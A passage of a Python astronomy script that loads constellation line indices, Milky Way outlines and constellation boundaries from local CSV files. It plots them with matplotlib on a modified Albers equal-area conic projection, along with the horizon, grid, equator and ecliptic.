[[0,1],[0,5],[0,7],[1,3],[2,3],[2,4],[2,6],[3,8],[4,5],[6,10]]\r\nLyn_line = [[0,1],[1,2],[2,3],[3,7],[4,5],[4,7]]\r\nLyr_line = [[0,6],[0,12],[1,2],[1,4],[2,6],[4,6],[6,12]]\r\nMen_line = [[0,1],[0,2],[1,4]]\r\nMic_line = [[0,1],[0,3],[1,2],[3,5]]\r\nMon_line = [[0,2],[1,5],[2,3],[2,5],[4,6],[5,6],[5,7]]\r\nMus_line = [[0,1],[0,2],[0,4],[0,5],[3,5]]\r\nNor_line = [[0,1],[0,7],[3,7]]\r\nOct_line = [[0,2],[1,2]]\r\nOph_line = [[0,5],[0,9],[1,2],[1,7],[1,12],[2,6],[3,6],[3,11],[5,11],[9,12]]\r\nOri_line = [[0,5],[0,6],[1,4],[1,10],[1,17],[2,6],[2,10],[2,34],[3,4],[3,6],[4,5],[8,12],[8,21],[12,13],[13,26],\\\r\n [17,27],[21,34],[23,24],[23,33],[24,27],[27,33]]\r\nPav_line = [[0,1],[1,2],[2,3],[3,4]]\r\nPeg_line = [[0,7],[1,2],[1,4],[1,6],[2,3],[2,5],[5,7],[6,9],[8,9]]\r\nPer_line = [[0,4],[0,5],[0,9],[1,6],[1,9],[2,10],[2,12],[3,5],[3,12],[4,7],[5,13],[6,18],[13,17],[17,21]]\r\nPhe_line = [[0,1],[0,3],[1,2],[1,4],[2,6],[2,8],[3,7],[3,10],[4,7],[10,11],[11,16]]\r\nPic_line = [[0,2],[1,2]]\r\nPsc_line = [[0,4],[0,34],[1,6],[1,21],[2,3],[2,9],[3,6],[3,11],[4,7],[5,9],[5,19],[7,10],[10,19],[11,21],[18,12],\\\r\n [18,34]]\r\nPsA_line = [[0,1],[0,2],[1,13],[2,5],[3,5],[3,7],[4,7],[4,13]]\r\nPup_line = [[0,2],[0,10],[1,4],[1,29],[2,11],[2,13],[3,4],[5,10],[6,11],[6,21],[10,14],[13,33],[21,28],[28,29]]\r\nPyx_line = [[0,1],[0,2]]\r\nRet_line = [[0,1],[0,2],[1,4],[2,6],[4,6]]\r\nSge_line = [[0,1],[1,2],[1,3]]\r\nSgr_line = [[0,2],[0,3],[0,6],[0,7],[1,8],[1,9],[1,11],[2,8],[2,9],[3,4],[3,6],[3,8],[4,8],[4,12],[5,11],\\\r\n [5,36],[6,20],[9,23],[10,11],[13,24],[13,36],[14,16],[16,17],[16,18],[18,22],[22,27],[23,27]]\r\nSco_line = [[0,8],[0,10],[1,5],[2,11],[2,14],[3,8],[3,12],[4,6],[4,9],[4,10],[14,16],[5,7],[5,11],[9,17],[12,16]]\r\nScl_line = [[0,3],[1,2],[2,3]]\r\nSct_line = [[0,1],[0,2],[0,3],[1,6],[3,4],[4,6]]\r\nSer_line = [[0,5],[0,7],[1,10],[2,5],[3,10],[4,7],[4,8],[4,9],[8,9]]\r\nSex_line = [[0,1],[0,2]]\r\nTau_line = [[0,3],[0,4],[1,6],[4,9],[5,9],[5,11],[6,12],[7,11],[9,12]]\r\nTel_line = [[0,1],[0,2]]\r\nTri_line = [[0,1],[0,2],[1,2]]\r\nTrA_line = [[0,1],[0,2],[1,4],[2,4]]\r\nTuc_line = [[0,1],[0,4],[1,3],[1,9],[2,3],[2,9]]\r\nUMa_line = [[0,3],[0,10],[1,4],[1,10],[1,15],[2,3],[4,5],[4,17],[5,10],[5,16],[6,7],[6,12],[6,16],[8,9],[9,14],\\\r\n [9,17],[11,15],[11,17]]\r\nUMi_line = [[0,6],[1,2],[1,5],[2,9],[3,5],[3,6],[5,9]]\r\nVel_line = [[0,8],[0,15],[1,3],[1,8],[2,7],[2,14],[3,6],[4,6],[4,11],[7,12],[11,12],[14,15]]\r\nVir_line = [[0,2],[0,13],[0,15],[1,3],[2,3],[2,14],[3,5],[4,9],[4,10],[5,9],[5,15],[7,14],[8,11],[10,18],[11,13],\\\r\n [12,18]]\r\nVol_line = [[0,4],[0,5],[1,2],[1,3],[2,5],[3,5]]\r\nVul_line = [[0,2],[0,5]]\r\n\r\n# milkyway\r\nMW_southernedge = numpy.zeros(shape=(263,4))\r\nMW_southernedge = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_southernedge.csv'))\r\nMW_MonPer = numpy.zeros(shape=(71,4))\r\nMW_MonPer = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_MonPer.csv'))\r\nMW_CamCas = numpy.zeros(shape=(13,4))\r\nMW_CamCas = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_CamCas.csv'))\r\nMW_Cep = numpy.zeros(shape=(13,4))\r\nMW_Cep = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_Cep.csv'))\r\nMW_CygOph = numpy.zeros(shape=(40,4))\r\nMW_CygOph = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_CygOph.csv'))\r\nMW_OphSco = numpy.zeros(shape=(17,4))\r\nMW_OphSco = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_OphSco.csv'))\r\nMW_LupVel = numpy.zeros(shape=(78,4))\r\nMW_LupVel = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_LupVel.csv'))\r\nMW_VelMon = numpy.zeros(shape=(34,4))\r\nMW_VelMon = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_VelMon.csv'))\r\ndark_PerCas = numpy.zeros(shape=(35,4))\r\ndark_PerCas = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_PerCas.csv'))\r\ndark_CasCep = numpy.zeros(shape=(28,4))\r\ndark_CasCep = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_CasCep.csv'))\r\ndark_betaCas = numpy.zeros(shape=(20,4))\r\ndark_betaCas = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_betaCas.csv'))\r\ndark_CygCep = numpy.zeros(shape=(22,4))\r\ndark_CygCep = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_CygCep.csv'))\r\ndark_CygOph = numpy.zeros(shape=(197,4))\r\ndark_CygOph = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_CygOph.csv'))\r\ndark_thetaOph = numpy.zeros(shape=(28,4))\r\ndark_thetaOph = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_thetaOph.csv'))\r\ndark_lambdaSco = numpy.zeros(shape=(17,4))\r\ndark_lambdaSco = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_lambdaSco.csv'))\r\ndark_ScoNor = numpy.zeros(shape=(31,4))\r\ndark_ScoNor = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_ScoNor.csv'))\r\ndark_Coalsack = numpy.zeros(shape=(32,4))\r\ndark_Coalsack = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_Coalsack.csv'))\r\ndark_Vel = numpy.zeros(shape=(22,4))\r\ndark_Vel = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','dark_Vel.csv'))\r\nMW_LMC1 = numpy.zeros(shape=(34,4))\r\nMW_LMC1 = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_LMC1.csv'))\r\nMW_LMC2 = numpy.zeros(shape=(12,4))\r\nMW_LMC2 = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_LMC2.csv'))\r\nMW_SMC = numpy.zeros(shape=(14,4))\r\nMW_SMC = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','MW_SMC.csv'))\r\n\r\nMW_list = [MW_southernedge,MW_MonPer,MW_CamCas,MW_Cep,MW_CygOph,MW_OphSco,MW_LupVel,MW_VelMon,\\\r\n dark_PerCas,dark_CasCep,dark_betaCas,dark_CygCep,dark_CygOph,dark_thetaOph,dark_lambdaSco,dark_ScoNor,dark_Coalsack,dark_Vel,\\\r\n MW_LMC1,MW_LMC2,MW_SMC]\r\n\r\n# constellation boundaries\r\nboundary = numpy.zeros(shape=(13238,5))\r\nboundary = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','boundary.csv'))\r\n\r\n############################################################## conic ##############################################################\r\n# observatory\r\n##ra0 = math.degrees(Obs.sidereal_time()) + zenith_shift_ra\r\nra0 = 0 # arbitrary\r\ndec0 = math.degrees(Obs[1]) + zenith_shift_dec\r\n\r\n# projection formula (modified Albers Equal-Area Conic)\r\n\r\nstand_para = (-60,0)\r\norigin = (180+18,6) #mars center at roughly(18,6)\r\n\r\nconic_A = 32\r\nconic_B = (conic_A+90)/90\r\n\r\nconic_n = 0.5*(math.sin(math.radians(stand_para[0]))+math.sin(math.radians(stand_para[1])))\r\nconic_C = math.cos(math.radians(stand_para[0]))*math.cos(math.radians(stand_para[0]))+2*conic_n*math.sin(math.radians(stand_para[0]))\r\nconic_rho0 = math.sqrt(conic_C-2*conic_n*math.sin(math.radians(origin[1])))/conic_n\r\n\r\ntransform_x_conic = lambda x,y: -math.sqrt(conic_C-2*conic_n*math.sin(math.radians((-y-conic_A)/conic_B)))/conic_n*math.sin(conic_n*math.radians(((x-origin[0]) % 360)-180)) \r\n\r\ntransform_y_conic = lambda x,y: math.sqrt(conic_C-2*conic_n*math.sin(math.radians((-y-conic_A)/conic_B)))/conic_n*math.cos(conic_n*math.radians(((x-origin[0]) % 360)-180))-conic_rho0\r\n\r\n#<--use (x-origin[0]) % 360 to shift projection center, then -180 to keep values [-180,180]\r\n\r\n# horizon\r\nfor i in range(360):\r\n horizon_conic.loc[i] = [i,math.degrees(math.atan(-math.cos(math.radians(ra0-i))/math.tan(math.radians(dec0)))),0,0]\r\n\r\nhorizon_conic.x = list(map(transform_x_conic, horizon_conic.RA, horizon_conic.Dec))\r\nhorizon_conic.y = list(map(transform_y_conic, horizon_conic.RA, horizon_conic.Dec))\r\n\r\n#plt.plot(horizon_conic_x,horizon_conic_y,'g-',zorder=1)\r\n\r\n# horizon size\r\nhori_border_conic = max(horizon_conic.x)-min(horizon_conic.x)\r\n\r\n#grid\r\n\r\nfor j in range(13):\r\n\r\n for i in range(360):\r\n\r\n grid_dec.loc[i] = [i,90-15*j,0,0] \r\n\r\n\r\n\r\n grid_dec.x = list(map(transform_x_conic, grid_dec.RA, grid_dec.Dec))\r\n\r\n grid_dec.y = list(map(transform_y_conic, grid_dec.RA, grid_dec.Dec))\r\n\r\n for k in range(len(grid_dec)-1):\r\n if -1 < grid_dec.x[k]-grid_dec.x[k+1] < 1: #roughly shorter than diameter of inner circle\r\n plt.plot([grid_dec.x[k],grid_dec.x[k+1]],[grid_dec.y[k],grid_dec.y[k+1]],color=(0.1,0.1,0.75,plot_alpha),zorder=1)\r\n \r\n #plt.plot(grid_dec.x,grid_dec.y,color=(0.1,0.1,0.75,plot_alpha),zorder=1)\r\n\r\n\r\nfor i in range(12):\r\n\r\n plt.plot([transform_x_conic(30*i,90),transform_x_conic(30*i,-90)],[transform_y_conic(30*i,90),transform_y_conic(30*i,-90)],color=(0.1,0.1,0.75,plot_alpha),zorder=1)\r\n\r\n# equator\r\nfor i in range(360):\r\n equator_conic.loc[i] = [i,0,0,0]\r\n\r\nequator_conic.x = list(map(transform_x_conic, equator_conic.RA, equator_conic.Dec))\r\nequator_conic.y = list(map(transform_y_conic, equator_conic.RA, equator_conic.Dec))\r\n\r\nfor i in range(len(equator_conic)-1):\r\n if -1 < equator_conic.x[i]-equator_conic.x[i+1] < 1: #roughly shorter than diameter of inner circle\r\n plt.plot([equator_conic.x[i],equator_conic.x[i+1]],[equator_conic.y[i],equator_conic.y[i+1]],'r-',alpha=plot_alpha,zorder=1)\r\n\r\n#plt.plot(equator_conic.x,equator_conic.y,'r-',alpha=plot_alpha,zorder=1)\r\n\r\n# ecliptic\r\nepsilon_J2000 = 23.4392911\r\nfor i in range(360):\r\n ecliptic_conic.loc[i] = [math.degrees(math.atan2(math.sin(math.radians(i))*math.cos(math.radians(epsilon_J2000)),math.cos(math.radians(i)))),\r\n math.degrees(math.asin(math.sin(math.radians(epsilon_J2000))*math.sin(math.radians(i)))),0,0]\r\n\r\necliptic_conic.x = list(map(transform_x_conic, ecliptic_conic.RA, ecliptic_conic.Dec))\r\necliptic_conic.y = list(map(transform_y_conic, ecliptic_conic.RA, ecliptic_conic.Dec))\r\n\r\nfor i in range(len(ecliptic_conic)-1):\r\n if -1 < ecliptic_conic.x[i]-ecliptic_conic.x[i+1] < 1: #roughly shorter than diameter of inner circle\r\n plt.plot([ecliptic_conic.x[i],ecliptic_conic.x[i+1]],[ecliptic_conic.y[i],ecliptic_conic.y[i+1]],'y-',alpha=plot_alpha+0.1,zorder=1)\r\n\r\n#plt.plot(ecliptic_conic.x,ecliptic_conic.y,'y-',alpha=plot_alpha+0.1,zorder=1)\r\n\r\n# constellations\r\nfor df in constellation_list:\r\n df.x = list(map(transform_x_conic, df.RA, df.Dec))\r\n df.y = list(map(transform_y_conic, df.RA, df.Dec)) # may then be overwritten by transform_po results\r\n\r\nconstellation_star_conic = [[And.x,And.y,And.mag],[Ant.x,Ant.y,Ant.mag],[Aps.x,Aps.y,Aps.mag],[Aqr.x,Aqr.y,Aqr.mag],\r\n [Aql.x,Aql.y,Aql.mag],[Ara.x,Ara.y,Ara.mag],[Ari.x,Ari.y,Ari.mag],[Aur.x,Aur.y,Aur.mag],\r\n [Boo.x,Boo.y,Boo.mag],[Cae.x,Cae.y,Cae.mag],[Cam.x,Cam.y,Cam.mag],[Cnc.x,Cnc.y,Cnc.mag],\r\n [CVn.x,CVn.y,CVn.mag],[CMa.x,CMa.y,CMa.mag],[CMi.x,CMi.y,CMi.mag],[Cap.x,Cap.y,Cap.mag],\r\n [Car.x,Car.y,Car.mag],[Cas.x,Cas.y,Cas.mag],[Cen.x,Cen.y,Cen.mag],[Cep.x,Cep.y,Cep.mag],\r\n [Cet.x,Cet.y,Cet.mag],[Cha.x,Cha.y,Cha.mag],[Cir.x,Cir.y,Cir.mag],[Col.x,Col.y,Col.mag],\r\n [Com.x,Com.y,Com.mag],[CrA.x,CrA.y,CrA.mag],[CrB.x,CrB.y,CrB.mag],[Crv.x,Crv.y,Crv.mag],\r\n [Crt.x,Crt.y,Crt.mag],[Cru.x,Cru.y,Cru.mag],[Cyg.x,Cyg.y,Cyg.mag],[Del.x,Del.y,Del.mag],\r\n [Dor.x,Dor.y,Dor.mag],[Dra.x,Dra.y,Dra.mag],[Equ.x,Equ.y,Equ.mag],[Eri.x,Eri.y,Eri.mag],\r\n [For.x,For.y,For.mag],[Gem.x,Gem.y,Gem.mag],[Gru.x,Gru.y,Gru.mag],[Her.x,Her.y,Her.mag],\r\n [Hor.x,Hor.y,Hor.mag],[Hya.x,Hya.y,Hya.mag],[Hyi.x,Hyi.y,Hyi.mag],[Ind.x,Ind.y,Ind.mag],\r\n [Lac.x,Lac.y,Lac.mag],[Leo.x,Leo.y,Leo.mag],[LMi.x,LMi.y,LMi.mag],[Lep.x,Lep.y,Lep.mag],\r\n [Lib.x,Lib.y,Lib.mag],[Lup.x,Lup.y,Lup.mag],[Lyn.x,Lyn.y,Lyn.mag],[Lyr.x,Lyr.y,Lyr.mag],\r\n [Men.x,Men.y,Men.mag],[Mic.x,Mic.y,Mic.mag],[Mon.x,Mon.y,Mon.mag],[Mus.x,Mus.y,Mus.mag],\r\n [Nor.x,Nor.y,Nor.mag],[Oct.x,Oct.y,Oct.mag],[Oph.x,Oph.y,Oph.mag],[Ori.x,Ori.y,Ori.mag],\r\n [Pav.x,Pav.y,Pav.mag],[Peg.x,Peg.y,Peg.mag],[Per.x,Per.y,Per.mag],[Phe.x,Phe.y,Phe.mag],\r\n [Pic.x,Pic.y,Pic.mag],[Psc.x,Psc.y,Psc.mag],[PsA.x,PsA.y,PsA.mag],[Pup.x,Pup.y,Pup.mag],\r\n [Pyx.x,Pyx.y,Pyx.mag],[Ret.x,Ret.y,Ret.mag],[Sge.x,Sge.y,Sge.mag],[Sgr.x,Sgr.y,Sgr.mag],\r\n [Sco.x,Sco.y,Sco.mag],[Scl.x,Scl.y,Scl.mag],[Sct.x,Sct.y,Sct.mag],[Ser.x,Ser.y,Ser.mag],\r\n [Sex.x,Sex.y,Sex.mag],[Tau.x,Tau.y,Tau.mag],[Tel.x,Tel.y,Tel.mag],[Tri.x,Tri.y,Tri.mag],\r\n [TrA.x,TrA.y,TrA.mag],[Tuc.x,Tuc.y,Tuc.mag],[UMa.x,UMa.y,UMa.mag],[UMi.x,UMi.y,UMi.mag],\r\n [Vel.x,Vel.y,Vel.mag],[Vir.x,Vir.y,Vir.mag],[Vol.x,Vol.y,Vol.mag],[Vul.x,Vul.y,Vul.mag]]\r\n\r\nfor x,y,z in constellation_star_conic:\r\n for j in range(len(x)):\r\n if z[j] <= mag_lim:\r\n plt.scatter(x[j],y[j], s=15*(10**(-0.4*z[j]))**0.5, c='white', alpha=plot_alpha, zorder=2)\r\n plt.scatter(x[j]-360,y[j], s=15*(10**(-0.4*z[j]))**0.5, c='white', alpha=plot_alpha, zorder=2)\r\n\r\nconstellation_line_conic = [[And.x,And.y,And_line,'And'],[Ant.x,Ant.y,Ant_line,'Ant'],[Aps.x,Aps.y,Aps_line,'Aps'],[Aqr.x,Aqr.y,Aqr_line,'$\\u2652$'],\r\n [Aql.x,Aql.y,Aql_line,'Aql'],[Ara.x,Ara.y,Ara_line,'Ara'],[Ari.x,Ari.y,Ari_line,'$\\u2648$'],[Aur.x,Aur.y,Aur_line,'Aur'],\r\n [Boo.x,Boo.y,Boo_line,'Boo'],[Cae.x,Cae.y,Cae_line,'Cae'],[Cam.x,Cam.y,Cam_line,'Cam'],[Cnc.x,Cnc.y,Cnc_line,'$\\u264B$'],\r\n [CVn.x,CVn.y,CVn_line,'CVn'],[CMa.x,CMa.y,CMa_line,'CMa'],[CMi.x,CMi.y,CMi_line,'CMi'],[Cap.x,Cap.y,Cap_line,'$\\u2651$'],\r\n [Car.x,Car.y,Car_line,'Car'],[Cas.x,Cas.y,Cas_line,'Cas'],[Cen.x,Cen.y,Cen_line,'Cen'],[Cep.x,Cep.y,Cep_line,'Cep'],\r\n [Cet.x,Cet.y,Cet_line,'Cet'],[Cha.x,Cha.y,Cha_line,'Cha'],[Cir.x,Cir.y,Cir_line,'Cir'],[Col.x,Col.y,Col_line,'Col'],\r\n [Com.x,Com.y,Com_line,'Com'],[CrA.x,CrA.y,CrA_line,'CrA'],[CrB.x,CrB.y,CrB_line,'CrB'],[Crv.x,Crv.y,Crv_line,'Crv'],\r\n [Crt.x,Crt.y,Crt_line,'Crt'],[Cru.x,Cru.y,Cru_line,'Cru'],[Cyg.x,Cyg.y,Cyg_line,'Cyg'],[Del.x,Del.y,Del_line,'Del'],\r\n [Dor.x,Dor.y,Dor_line,'Dor'],[Dra.x,Dra.y,Dra_line,'Dra'],[Equ.x,Equ.y,Equ_line,'Equ'],[Eri.x,Eri.y,Eri_line,'Eri'],\r\n [For.x,For.y,For_line,'For'],[Gem.x,Gem.y,Gem_line,'$\\u264A$'],[Gru.x,Gru.y,Gru_line,'Gru'],[Her.x,Her.y,Her_line,'Her'],\r\n [Hor.x,Hor.y,Hor_line,'Hor'],[Hya.x,Hya.y,Hya_line,'Hya'],[Hyi.x,Hyi.y,Hyi_line,'Hyi'],[Ind.x,Ind.y,Ind_line,'Ind'],\r\n [Lac.x,Lac.y,Lac_line,'Lac'],[Leo.x,Leo.y,Leo_line,'$\\u264C$'],[LMi.x,LMi.y,LMi_line,'LMi'],[Lep.x,Lep.y,Lep_line,'Lep'],\r\n [Lib.x,Lib.y,Lib_line,'$\\u264E$'],[Lup.x,Lup.y,Lup_line,'Lup'],[Lyn.x,Lyn.y,Lyn_line,'Lyn'],[Lyr.x,Lyr.y,Lyr_line,'Lyr'],\r\n [Men.x,Men.y,Men_line,'Men'],[Mic.x,Mic.y,Mic_line,'Mic'],[Mon.x,Mon.y,Mon_line,'Mon'],[Mus.x,Mus.y,Mus_line,'Mus'],\r\n [Nor.x,Nor.y,Nor_line,'Nor'],[Oct.x,Oct.y,Oct_line,'Oct'],[Oph.x,Oph.y,Oph_line,'Oph'],[Ori.x,Ori.y,Ori_line,'Ori'],\r\n [Pav.x,Pav.y,Pav_line,'Pav'],[Peg.x,Peg.y,Peg_line,'Peg'],[Per.x,Per.y,Per_line,'Per'],[Phe.x,Phe.y,Phe_line,'Phe'],\r\n [Pic.x,Pic.y,Pic_line,'Pic'],[Psc.x,Psc.y,Psc_line,'$\\u2653$'],[PsA.x,PsA.y,PsA_line,'PsA'],[Pup.x,Pup.y,Pup_line,'Pup'],\r\n [Pyx.x,Pyx.y,Pyx_line,'Pyx'],[Ret.x,Ret.y,Ret_line,'Ret'],[Sge.x,Sge.y,Sge_line,'Sge'],[Sgr.x,Sgr.y,Sgr_line,'$\\u2650$'],\r\n [Sco.x,Sco.y,Sco_line,'$\\u264F$'],[Scl.x,Scl.y,Scl_line,'Scl'],[Sct.x,Sct.y,Sct_line,'Sct'],[Ser.x,Ser.y,Ser_line,'Ser'],\r\n [Sex.x,Sex.y,Sex_line,'Sex'],[Tau.x,Tau.y,Tau_line,'$\\u2649$'],[Tel.x,Tel.y,Tel_line,'Tel'],[Tri.x,Tri.y,Tri_line,'Tri'],\r\n [TrA.x,TrA.y,TrA_line,'TrA'],[Tuc.x,Tuc.y,Tuc_line,'Tuc'],[UMa.x,UMa.y,UMa_line,'UMa'],[UMi.x,UMi.y,UMi_line,'UMi'],\r\n [Vel.x,Vel.y,Vel_line,'Vel'],[Vir.x,Vir.y,Vir_line,'$\\u264D$'],[Vol.x,Vol.y,Vol_line,'Vol'],[Vul.x,Vul.y,Vul_line,'Vul']]\r\n\r\n# constellation linecollection\r\nconstellation_line_z_xy1_conic = [] # (x,y) pair of vertics 1\r\nconstellation_line_z_xy2_conic = [] # (x,y) pair of vertics 2\r\nconstellation_line_xy1_conic = []\r\nconstellation_line_xy2_conic = []\r\nfor i in range(len(constellation_line_conic)):\r\n for j in range(len(constellation_line_conic[i][2])):\r\n if constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]]-constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]] > hori_border_conic/2:\r\n constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]] = numpy.nan #unconnect astray pts\r\n if i in set([3,6,11,15,37,45,48,58,65,71,72,77,85]): # zodiacs\r\n constellation_line_z_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]])-360,(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_z_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n constellation_line_z_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_z_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]])+360,(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n else:\r\n constellation_line_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]])-360,(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n constellation_line_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]])+360,(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n elif constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]]-constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]] < -hori_border_conic/2:\r\n constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]] = numpy.nan #unconnect astray pts\r\n if i in set([3,6,11,15,37,45,48,58,65,71,72,77,85]): # zodiacs\r\n constellation_line_z_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]])+360,(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_z_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n constellation_line_z_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_z_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]])-360,(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n else:\r\n constellation_line_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]])+360,(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n constellation_line_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]])-360,(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n else:\r\n if i in set([3,6,11,15,37,45,48,58,65,71,72,77,85]): # zodiacs\r\n constellation_line_z_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_z_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n else:\r\n constellation_line_xy1_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][0]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][0]])])\r\n constellation_line_xy2_conic.append([(constellation_line_conic[i][0][constellation_line_conic[i][2][j][1]]),(constellation_line_conic[i][1][constellation_line_conic[i][2][j][1]])])\r\n\r\nconstellation_line_z_list_conic = zip(constellation_line_z_xy1_conic,constellation_line_z_xy2_conic)\r\nconstellation_line_list_conic = zip(constellation_line_xy1_conic,constellation_line_xy2_conic)\r\n\r\nlc_west_z_conic = mc.LineCollection(constellation_line_z_list_conic, colors='yellow', zorder=10+2.5)\r\nlc_west_conic = mc.LineCollection(constellation_line_list_conic, colors='white', zorder=10+2.5)\r\nlc_west_z_conic.set_alpha(plot_alpha)\r\nlc_west_conic.set_alpha(plot_alpha)\r\nax0.add_collection(lc_west_z_conic)\r\nax0.add_collection(lc_west_conic)\r\n\r\n# others linecollection\r\nconstellation_dotted_line_conic = [[(Aur.x[3],Aur.y[3]),(Tau.x[1],Tau.y[1])],[(Aur.x[2],Aur.y[2]),(Tau.x[1],Tau.y[1])],\r\n [(Peg.x[1],Peg.y[1]),(And.x[0],And.y[0])],[(Peg.x[3],Peg.y[3]),(And.x[0],And.y[0])],\r\n [(Ser.x[3],Ser.y[3]),(Oph.x[7],Oph.y[7])],[(Ser.x[2],Ser.y[2]),(Oph.x[3],Oph.y[3])],\r\n [(PsA.x[0],PsA.y[0]),(Aqr.x[18],Aqr.y[18])]]\r\n\r\nconstellation_dotted_line_list_conic = []\r\nfor i in range(len(constellation_dotted_line_conic)):\r\n if constellation_dotted_line_conic[i][0][0]-constellation_dotted_line_conic[i][1][0] > hori_border_conic/2:\r\n constellation_dotted_line_list_conic.append(((constellation_dotted_line_conic[i][0][0]-360,constellation_dotted_line_conic[i][0][1]),constellation_dotted_line_conic[i][1]))\r\n constellation_dotted_line_list_conic.append((constellation_dotted_line_conic[i][0],(constellation_dotted_line_conic[i][1][0]+360,constellation_dotted_line_conic[i][1][1])))\r\n elif constellation_dotted_line_conic[i][0][0]-constellation_dotted_line_conic[i][1][0] < -hori_border_conic/2:\r\n constellation_dotted_line_list_conic.append(((constellation_dotted_line_conic[i][0][0]+360,constellation_dotted_line_conic[i][0][1]),constellation_dotted_line_conic[i][1]))\r\n constellation_dotted_line_list_conic.append((constellation_dotted_line_conic[i][0],(constellation_dotted_line_conic[i][1][0]-360,constellation_dotted_line_conic[i][1][1])))\r\n else:\r\n constellation_dotted_line_list_conic.append(constellation_dotted_line_conic[i])\r\n\r\nlc_west_dotted_conic = mc.LineCollection(constellation_dotted_line_list_conic, colors='white', linestyles='dashed',zorder=10+2.5)\r\nlc_west_dotted_conic.set_alpha(plot_alpha)\r\nax0.add_collection(lc_west_dotted_conic)\r\n\r\n# annotation\r\nif annotation_on == 1:\r\n for x,y,z,n in constellation_line_conic:\r\n if n in set(['$\\u2652$','$\\u2648$','$\\u264B$','$\\u2651$','$\\u264A$','$\\u264C$','$\\u264E$','$\\u2653$','$\\u2650$','$\\u264F$','$\\u2649$','$\\u264D$']):\r\n ax0.annotate(str(n),(numpy.mean(x),numpy.mean(y)-labelxy),color='y')\r\n else:\r\n ax0.annotate(str(n),(numpy.mean(x),numpy.mean(y)-labelxy),color='w')\r\n\r\n# milkyway\r\nMW_line_list_conic = []\r\nfor df in MW_list:\r\n df.x = list(map(transform_x_conic, df.RA, df.Dec))\r\n df.y = list(map(transform_y_conic, df.RA, df.Dec))\r\n for i in range(len(df)-1):\r\n if df.x[i]-df.x[i+1] > hori_border_conic/2:\r\n df.x[i] = numpy.nan\r\n MW_line_list_conic.append([(df.x[i]-360,df.y[i]),(df.x[i+1],df.y[i+1])])\r\n MW_line_list_conic.append([(df.x[i],df.y[i]),(df.x[i+1]+360,df.y[i+1])])\r\n elif df.x[i]-df.x[i+1] < 